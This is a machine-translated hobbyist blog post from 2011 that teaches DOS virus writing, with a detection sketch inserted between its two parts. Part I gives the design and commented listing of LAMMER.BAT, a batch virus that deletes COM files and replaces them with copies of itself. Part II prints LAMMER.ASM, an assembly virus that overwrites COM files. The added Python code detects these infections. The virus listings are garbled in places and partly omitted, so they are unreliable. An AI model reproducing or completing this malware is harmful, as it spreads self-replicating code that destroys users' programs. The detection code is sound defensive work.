wadah batakun


  • Tuesday, 14 June 2011

    Computer Virus Programming Part I

    Posted by sayap patah on 04.59

    Dedication: For Knowledgement & Open Source
                   
    Greetz: # DEFACE-TEAM@IRC.DAL.NET
                   
    # DHEGLENG@IRC.DAL.NET

    Attention.
    The program below can infect the system, but in a way that is quickly noticed. The following suggestions should always be observed when experimenting with the virus:
    1. Work only on backup copies of files.
    2. Do not let viruses or infected programs fall into other people's hands.
    3. After the experiment, delete all programs that have been infected.
    4. Protect the hard disk against unexpected writes by using the DOS command ASSIGN.

    Type the following command at the DOS prompt: A> assign c=a (master DOS diskette in drive A)
    In this way, all actions aimed at the hard disk are redirected to drive A. This protection is not really tight, but it can stop most viruses from attacking your hard disk. To return to normal, type "assign c=c" while the master DOS diskette is in drive A. If the above requirements are followed when you work with a virus program, there is no danger of unintentional transmission.
    ------------------------------------ 1. COMPUTER VIRUS IN BATCHFILE ------------------------------------
    As a first step in studying computer virus programming, this part presents a computer virus written as a batch file. The virus uses the facilities of DOS by calling internal and external commands. Internal commands (commands that are "inside" the operating system module that is loaded into internal memory/RAM at boot time) are used as in any batch file. For the external commands, such as DEBUG and EDLIN, instruction files are provided, and the virus needs these files as well. It also uses the input and output redirection of PC-DOS (I/O redirection). The virus only attacks files that have the COM extension. As we all know, a virus has 5 abilities, namely:
    the ability to obtain information, the ability to check the program, the ability to multiply and transmit, the ability to hide itself. Of the five abilities, only 2 are possessed by the batch-file virus that I will discuss here, namely the ability to obtain information and the ability to multiply and infect other files. Nevertheless, this virus is able to work, because these two abilities are the nucleus of a computer virus, while the others are merely additional. In terms of type, this batch-file virus is one that rides on the program it infects. A program that this virus has infected can therefore no longer be used, because it has been damaged by the virus.
    ------------------------------------ 2. ALGORITHM ------------------------------------
    Suppose that the batch-file virus is named LAMMER.BAT. LAMMER.BAT must then contain a series of instructions capable of performing the following activities:
    1. Search for the first COM file in the directory (if any)
    2. Delete that file
    3. Copy LAMMER.BAT to a file with the same name as the file that was deleted, but with the extension BAT

    Thus, after transmission, the contents of the infected file are exactly the same as LAMMER.BAT, so that invoking the infected file has the same effect as calling LAMMER.BAT.
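The three steps above leave a recognisable trace in a directory: a COM file disappears, a BAT file with the same base name appears, and its content is byte-identical to another batch file. The following detection sketch is an added example, not part of the original post; the function name, snapshot format and sample data are assumptions made for illustration.

```python
import hashlib

def _sha256(data: bytes) -> str:
    return hashlib.sha256(data).hexdigest()

def find_com_to_bat_swaps(before: dict, after: dict) -> list:
    """Compare two snapshots of one directory (file name -> content bytes).

    Reports every X.COM that disappeared while X.BAT appeared, and lists
    other batch files in the 'after' snapshot with byte-identical content.
    """
    old = {name.upper() for name in before}
    new = {name.upper(): data for name, data in after.items()}
    # Group the batch files of the later snapshot by content hash.
    by_hash = {}
    for name, data in new.items():
        if name.endswith(".BAT"):
            by_hash.setdefault(_sha256(data), []).append(name)
    findings = []
    for name in sorted(old):
        if not name.endswith(".COM") or name in new:
            continue  # not a COM file, or it still exists
        bat = name[:-4] + ".BAT"
        if bat in new and bat not in old:
            twins = sorted(n for n in by_hash[_sha256(new[bat])] if n != bat)
            findings.append({"removed": name, "created": bat,
                             "identical_to": twins})
    return findings

# Constructed sample snapshots; the batch content is a harmless placeholder.
PLACEHOLDER = b"REM constructed placeholder\r\n"
BEFORE = {"LAMMER.BAT": PLACEHOLDER, "ASSIGN.COM": b"\x90\xc3",
          "EDIT.COM": b"\xc3"}
AFTER = {"LAMMER.BAT": PLACEHOLDER, "ASSIGN.BAT": PLACEHOLDER,
         "EDIT.COM": b"\xc3"}

if __name__ == "__main__":
    for finding in find_com_to_bat_swaps(BEFORE, AFTER):
        print(finding)
```

An empty `identical_to` list does not clear a finding, since the source batch file may sit in another directory.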
    ------------------------------------ 3. FLOW CHART ------------------------------------
    START
      |
    Create a file that contains the names of the files that have the COM extension.
      |
    Select the first file name (e.g. named KORBAN.COM)
      |
    Create a new batch file that contains the instructions:
    DEL KORBAN.COM
    COPY \ LAMMER.BAT KORBAN.BAT
      |
    Call / run the new batch file
      |
    END

    ------------------------------------ 4. Program Listings ------------------------------------
    The batch file below is an implementation of the flow chart above.
    FILE NAME: LAMMER.BAT
    Echo off - output to the screen is suppressed, so that the work performed by the batch file is not visible to the user
    Ctty nul - input and output are redirected to the NUL device
    Dir *. com / w.daftar - The names of all files with the extension .COM in the active directory are written to the file DAFTAR. The option "/ w" hides the dates and lengths of the files
    Edlin list <\ 1 - EDLIN takes its input from the commands in the instruction file "1" to edit the file LIST
    Debug list <\ 2 - DEBUG is called on LIST and executes the commands from file "2" to create the batch file PERINTAH.BAT
    Edlin perintah.bat <\ 3 - The text editor EDLIN is called on the file PERINTAH.BAT with the instruction file "3"
    Del list .* - The files LIST and DAFTAR.BAK are deleted
    Del perintah.bak - The file PERINTAH.BAK is deleted
    Ctty con - Input and output return to the keyboard and screen, but the screen remains empty (echo off)
    Commands - The file PERINTAH.BAT is called. If the virus is infecting the file ASSIGN.COM, then PERINTAH.BAT contains the following:
                          
    DEL ASSIGN.COM
                          
    COPY \ LAMMER.BAT


    The 3 instruction files named "1", "2" and "3" (without extensions) that accompany the batch file LAMMER.BAT above are as follows:
    FILE NAME: 1
    1.4 d e
    FILE NAME: 2
    M100, 10b, f000 E108. "Bat" M100, 10b, f010 E100 "DEL" Mf000, f00b, 104 E10c 2e E110 0D, 0a Mf010, f020, 11f E112 "COPY \ LAMMER.BAT" E12b 0D, 0a RCX 2c nperintah.bat w q





    FILE NAME: 3
    Sorry, the third instruction file cannot be written out in this section because it contains Ctrl-Z (hex 1Ah) twice, and I myself am already tired of writing, hehehehe, you know how it is, my herbal drink isn't strong enough yet :) Use your creativity as a programmer.
    That concludes this information about a computer virus in a batch file. I hope what I have said here is useful to friends who want to understand virus programming techniques and how they work. And do not forget to stay tuned for my next article.



    Computer Virus Programming Part II
    Dedication: For Knowledgement & Open Source
                   
    Greetz: # DEFACE-TEAM@IRC.DAL.NET
                   
    # DHEGLENG@IRC.DAL.NET

    1. Preliminary
    The computer virus discussed below is written in assembly language. Compared with the batch-file virus, the virus we discuss now has the five abilities I mentioned earlier. The virus is able to find all COM files that exist on the diskette and examine whether each has been infected or not. If it has not, the virus will infect it. The manipulation routine of this virus only displays a message: "This file has been infected with computer virus!" or "All COM files on the diskette has been contracting a computer virus !!!". Unlike the batch-file virus, which produces a new file and needs several files to run, the virus discussed here can work alone and does not generate new files, so its ability to hide itself is better. Like the batch-file virus, the virus below is of the type that rides on the program it infects. Such viruses are therefore harmful.
    2. Algorithm
    The algorithm used is as follows:
    1. Find the first COM file
    2. Open and read the file, and place it in the buffer (in RAM)
    3. By comparing the virus identification with the sequence of bytes at the beginning of the program, check whether the file has been infected with the virus or not.
    4. a) If not, infect the file by copying the entire virus program onto it (riding on it). Then show the message: "This file has been infected Computer Virus! "
       b) If so, look for the next COM file. Repeat step 2.
    5. If all COM files have been infected, show the message: "all files on diskette Com This computer has been infected with a virus! "

    3. Programs and Mechanisms of Transmission
    The program below is an implementation of the above.
    Note: This virus program uses macros. The definitions of the macro instructions used are contained in the file LAMMER.MAC (if you want to see the macro file, send an email to Dr `Ponidi@crackdealer.com)
    ;------------------------------------------------- ----------------------------------- ; LAMMER.ASM ; ; CODE BY: # DEFACE-TEAM@IRC.DAL.NET ; # DHEGLENG@IRC.DAL.NET ; ; Retrieval SYSTEM BY: DR `PONIDI@CRACKDEALER.COM ; ; THIS VIRUS ATTACK AND ALL DAMAGE THE FILE COM. ; BEWARE! ;------------------------------------------------- -----------------------------------

                            
    IF1
                            
    INCLUDE LAMMER.MAC
                            
    EndIf
    Code_seg Segment
                 
    ASSUME CS: Code_seg
                 
    ORG 100H Start: jmp done The identity of DB `This file has been infected with computer viruses! $` Warning DB `all COM files in the floppy disk has been infected with the virus`
                 
    DB `Computer !!!$` File_COM `DB` *. com, 0h Nama_file DB 13 DUP (?) Panjang_id equ 45 Panjang_vir equ 445 Attribute equ 20h Open_code equ 2 Total equ 0ffffh DTA DB43 DUP (20h)



    Work: Set_DTA DTA
                            
    Mov ax, 0
                            
    Find_first file_COM, Attributes Masih_adakah: cmp ax, 0
                             
    Je Conduct
                             
    Cmp ax, 2
                             
    Je Exit
                             
    Tulis_string warning
                             
    Jmp Exit Exit: Ke_dos Implement: mov si, offset DTA + 30
                             
    Pindahkan_string 13, nama_file
                             
    Buka_file_DTA DTA, Open_code
                             
    Push bx
                             
    Baca_file bx, buffer, number of
                             
    Push ax
                             
    Mov in, offset buffer + 3
                             
    Compare Identity-string, panjang_id
                             
    Cmp bx, 0
                             
    Je Cari_lainnya
                             
    Mov si, 100H
                             
    Pindahkan_string panjang_vir, Buffer
                             
    Pop ax
                             
    Pop bx
                             
    Push ax
                             
    Tutup_file bx
                             
    Hapus_file Nama_file
                             
    Buat_file Nama_file, Attributes
                             
    Buka_file Nama_file, Open_code
                             
    Pop ax
                             
    Tulis_file bx, buffer, ax
                             
    Tutup_file bx
                             
    Tulis_string identity
                             
    Ke_dos
    Cari_lainnya: pop ax
                            
    pop bx
                            
    Tutup_file bx
                            
    Find_next
                            
    Jmp masih_adakah Label Buffer byte Code_seg ENDS
                            
    END start

    4. Explanation
    Transmission begins when the virus program is run on a floppy disk containing COM files. The virus will initially infect the first COM file (in the order of the files on the diskette). With this transmission, the file becomes a new source of infection and the original file is deleted. Files infected by the virus have their file size changed. If an infected file is run, it cannot perform its function and will only display the message: "This file has been infected with virus computer! ". Before that, the file will infect another COM file. If by chance the first COM file attacked in the main directory is COMMAND.COM, then every time you boot from that floppy it will never work, and first the virus will infect a COM program that has not been infected. Please note that this virus may not work well when placed on a COM file that is smaller than the size of the original virus program, or too big (close to or more than FFFF hexadecimal = 64KB). This is because the virus program cannot be copied in full, or the buffer goes beyond the boundary of the CS (Code Segment).
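Step 3 of the algorithm and the constants in the listing (the comparison at "offset buffer + 3" and "Panjang_id equ 45") describe a fixed identification string that a scanner can look for as well. The following marker check is an added example, not code from the original post; the marker bytes are a constructed placeholder, and the function names and the minimum length for a partial match are assumptions.

```python
ID_OFFSET = 3     # listing compares at "offset buffer + 3", past a 3-byte jump
ID_LENGTH = 45    # "Panjang_id equ 45" in the listing
MIN_PARTIAL = 8   # assumption: shortest prefix accepted as a cut-off marker

def classify_com(image: bytes, marker: bytes) -> str:
    """Return 'marked', 'marked_truncated' or 'clean' for one COM image."""
    if len(marker) != ID_LENGTH:
        raise ValueError("marker must be ID_LENGTH bytes long")
    window = image[ID_OFFSET:ID_OFFSET + ID_LENGTH]
    if window == marker:
        return "marked"
    # The explanation says small hosts do not receive a full copy, so a
    # short file may end in the middle of the identification string.
    if MIN_PARTIAL <= len(window) < ID_LENGTH and marker.startswith(window):
        return "marked_truncated"
    return "clean"

def scan(files: dict, marker: bytes) -> dict:
    """files maps name -> content bytes; only *.COM names are examined."""
    return {name: classify_com(data, marker)
            for name, data in sorted(files.items())
            if name.upper().endswith(".COM")}

# Constructed sample data: a placeholder marker, not bytes from the virus.
SAMPLE_MARKER = b"CONSTRUCTED-PLACEHOLDER-MARKER".ljust(ID_LENGTH, b".")
JUMP = b"\xe9\x00\x00"  # three bytes standing in for the leading jump
SAMPLE_FILES = {
    "GOOD.COM": b"\xb4\x4c\xcd\x21" + b"\x90" * 60,
    "BAD.COM": JUMP + SAMPLE_MARKER + b"\x00" * 100,
    "TINY.COM": JUMP + SAMPLE_MARKER[:10],
    "NOTES.TXT": JUMP + SAMPLE_MARKER,
}

if __name__ == "__main__":
    for name, verdict in scan(SAMPLE_FILES, SAMPLE_MARKER).items():
        print(name, verdict)
```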






    That is the article I can present on this occasion. I hope the information I have given is useful knowledge for us all, especially for those who are concerned with viruses. That's all, thanks, ciao.
